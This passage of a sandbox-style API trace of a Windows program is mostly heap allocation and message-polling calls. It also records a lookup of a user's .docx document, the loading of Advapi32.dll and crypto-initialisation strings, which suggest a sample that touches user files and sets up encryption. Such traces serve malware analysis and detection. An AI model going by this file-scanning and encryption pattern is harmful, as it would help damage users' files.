[0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0267.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0267.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0267.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.354] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0267.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0267.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0267.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.355] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0267.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0267.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0267.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0267.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.357] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/S7DDzGLO.docx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe825e1e0, ftCreationTime.dwHighDateTime=0x1d5ab39, ftLastAccessTime.dwLowDateTime=0xb00c280, ftLastAccessTime.dwHighDateTime=0x1d566c4, ftLastWriteTime.dwLowDateTime=0xb00c280, ftLastWriteTime.dwHighDateTime=0x1d566c4, nFileSizeHigh=0x0, nFileSizeLow=0x6794, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="S7DDzGLO.docx", cAlternateFileName="S7DDZG~1.DOC")) returned 0xa87690 [0267.357] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0267.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0267.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0267.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0267.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.357] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0267.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0267.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0267.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.358] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0267.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.358] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0267.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0267.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0267.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0267.369] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0267.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0267.369] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0267.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0267.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0267.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0267.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0267.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0267.370] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.372] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0267.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0267.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0267.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0267.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0267.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0267.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0267.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0267.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.374] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.374] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0267.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0267.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0267.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0267.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0267.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | 